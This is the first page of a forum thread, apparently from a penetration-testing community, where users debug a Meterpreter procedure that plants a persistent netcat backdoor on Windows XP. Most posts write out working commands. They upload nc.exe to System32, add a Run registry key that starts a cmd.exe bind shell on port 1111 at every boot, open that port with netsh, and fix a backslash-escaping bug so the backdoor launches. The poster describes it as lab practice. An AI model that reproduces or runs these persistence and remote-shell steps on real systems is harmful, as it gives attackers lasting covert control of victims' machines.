Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: netcat/backdoor

Hybrid View

  1. #1
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default netcat/backdoor

    hello guys!
    I'm 'trying to bt5kde "tutorial upload netcat backdoor" that tested on BT3-4 worked! I've problem in bt5!MY "laboratory" is bt5host, xp sp3 virtual,vista virtual.When i'm obtaing a meterpreter shell and run the commands "everything looks perfect" but I get the call of the netcat connection refused!my commands are:
    *meterpreter> upload /root/nc.exe C:\\WINDOWS\\SYSTEM32\\ OK!
    *meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run OK!
    *meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\SYSTEM32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!
    Successful set CIAUZ.
    *meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run OK!

    OptionalComponents

    Values (4):

    VBoxTray
    Adobe Reader Speed Launcher
    Adobe ARM
    CIAUZ )))) :))))
    meterpreter >reboot OK!
    exit meterpreter shell OK!
    root@bt:~# nc 192.168.1.165 1111
    (UNKNOWN) [192.168.1.165] 1111 (?) : Connection refused PROBLEM!!!!!
    sorry for my language!thanks for all! please help me!in bt3-4 the same lab machine ,the same network,the same commands nc .exe automatic start up in windows!
    bye thks!

  2. #2
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    18

    Default Riferimento: netcat/backdoor

    Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. For this :

    meterpreter > execute -f cmd -i

    Process 1604 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\Victim\My Documents > netsh firewall show opmode
    Netsh firewall show opmode

    C:\Documents and Settings\Victim\My Documents > netsh firewall add portopening TCP 1111 "Service Firewall" ENABLE ALL

    C:\Documents and Settings\Victim\My Documents > netsh firewall show portopening

    Bye Bye !!

  3. #3
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: netcat/backdoor

    So if you do a netstat on the system you're "attacking" do you see netcat listening on 1111? Does task manager on the "victim" machine show nc.exe running after you reboot it?
    Last edited by thorin; 05-26-2011 at 04:12 PM.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: netcat/backdoor

    thanks thorin for reply!in netstat victim don't result netcat working on 1111,and task-manager(victim)i don't have nc.exe!!!.i'm now testing on another old pc with bt4r2+xp sp3 virt and IT'S OK!!!!! mmmmm what's DIFFERENT ! thanks bye

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: netcat/backdoor

    Was your original post quoting info from the XP SP 3 machine or the Vista machine because you mention them both?

    Does nc.exe exist within C:\\WINDOWS\\SYSTEM32\\ as you originally upload it there? If you check event viewer on the victim is there anything during boot up that shows why it may have failed to launch?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  6. #6
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: netcat/backdoor

    thanks thorin!
    xp sp3 quoting info (vista is poweroff but with this command works also) iin C:\\WINDOWS\\SYSTEM32\\ have nc.exe!.for another check event viewer........will tonight!my wife breack"my-balls"!!!!!! many,many thanks! see you!

  7. #7
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: netcat/backdoor

    SOLVED! i'm happy: bt5 >xp sp3 virtual
    when i code:
    reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!!!
    in the victim(xp) look in regedit:
    CIAUZ REG_SZ C:WINDOWSsystem32nc.exe -L -d -p 1111 here is error!
    i'm correctly with my hand dx :
    CIAUZ REG_SZ C:\WINDOWS\system32\nc.exe -L -d -p 1111 IT'S WORK NOW )
    but I do not know where is the error! how many \\\\\\\\ give in attack command?
    excuse my ignorance! thanks to everyone! special thanks to THORIN bye

  8. #8
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: netcat/backdoor

    for datalife:thanks for reply!
    I have all firewalls disabled! (router.host, virtual)!for my bad experience
    I think the problem might be caused by Metasploit (meterpreter), because the command
    reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe"
    But in victimpc nc.exe does not start automatically because it is a mistake to slash \ \ \ result: in the victim (xp) look in regedit:
    Ciauz REG_SZ C: WINDOWSsystem32nc.exe-L-d-p 1111 error is here!
    I do not know where is the problem! repeat the exact same situation (PC, network, virual, etc.) carried out in BT4 works fine for me! I'd like to know if the problem is mine alone? thank you all!

  9. #9
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: netcat/backdoor

    Hi Zimmaro

    I've been testing this as well. Using BT5 - 32bit - Gnome and the Victim machine is XP SP3 (Not Virtual)

    I'm experiencing the same thing as you missing \ from the registry value "c:\windows\system32\nc.exe......."
    I've noticed though, that if you set the registry key like this;

    Code:
    regsetval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run - backdoor -d C:\\Windows\\system32\\nc.exe
    You will see the registry value is correct, c:\windows\system32\nc.exe

    But as soon as you use the " " to accommodate the spaces you loose the \ slashes

    I'll keep playing

  10. #10
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: netcat/backdoor

    hi jimmy87!
    have you the same problem!(if I understand)
    now i don't have time for testing(Because my sons!!!)
    try without "" thanks!bye there is big problem!
    when you think you understand something, you have to learn another!!!!!
    bye

Page 1 of 2 12 LastLast

Similar Threads

  1. Replies: 20
    Last Post: 03-26-2011, 08:30 PM
  2. netcat backdoor with NAT
    By iamahackernotreallynot in forum Beginners Forum
    Replies: 3
    Last Post: 08-26-2010, 09:10 PM
  3. How To Backdoor an OPN AP
    By Eatme in forum OLD Pentesting
    Replies: 23
    Last Post: 08-18-2009, 04:41 AM
  4. Ettercap/Metasploit and netcat for backdoor
    By overide in forum OLD Tutorials and Guides
    Replies: 3
    Last Post: 10-03-2008, 02:54 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •